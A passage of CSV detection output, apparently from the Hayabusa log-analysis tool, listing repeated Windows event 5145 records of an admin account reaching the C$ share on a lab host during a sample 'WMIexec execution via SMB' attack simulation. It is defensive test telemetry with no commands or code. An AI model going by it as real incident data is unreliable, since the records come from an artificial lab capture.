2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4#\b77a61cdfca8e3f67916586b89eb6df5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f#\2cbdedd1fc5676a39a1fb1b534f48d02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#\e3e82e97635cdd0d33dd1fb39ffe5b5f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.113 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797#\4bdb448dffd981eb795d0efeaf81aee9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1#\bbfc6bc472afc457c523dc2738248629 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837#\294124bd4523f5af19788c4942aeba5e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5#\e9ab45e2a1806140421e99300db14933 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3#\278d9be2765837ed33460677146f35e8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137#\82f3f76602a3738000b03df08a71ffe8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032#\d3293b74965baef61a05323c7ec98d92 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd#\711dbd144f8f71a864ea8493a3877bc5 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#\28242ebb69175640e01f44f44845482c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.191 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#\be26a3df8bcf20be912896fba8462d2f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f#\84ae811d9df57eca1c9728263a6e6aff | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\desktop.ini | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#\4f9e41de8acf7fe60bc43242811fbabd | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1#\960951a3fe97e1a2bd2d09ced71ce4f3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05#\2145d62276d37b22799a8deb8d44b210 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.238 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5#\fb97af1f4b1eed42372eea20ba746a53 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#\a26561bad24a68eb0217aa9d9fdad386 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466#\50e266485611719e095733dd021e3a42 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b#\44e2747436ee8621f4daf918b1922498 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4#\748bf388335b4acc7031af4d134ad037 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7#\7dbfc45fb55f5cf738956f4c7b2f8639 | IP Addr: 10.23.23.9 | LID: 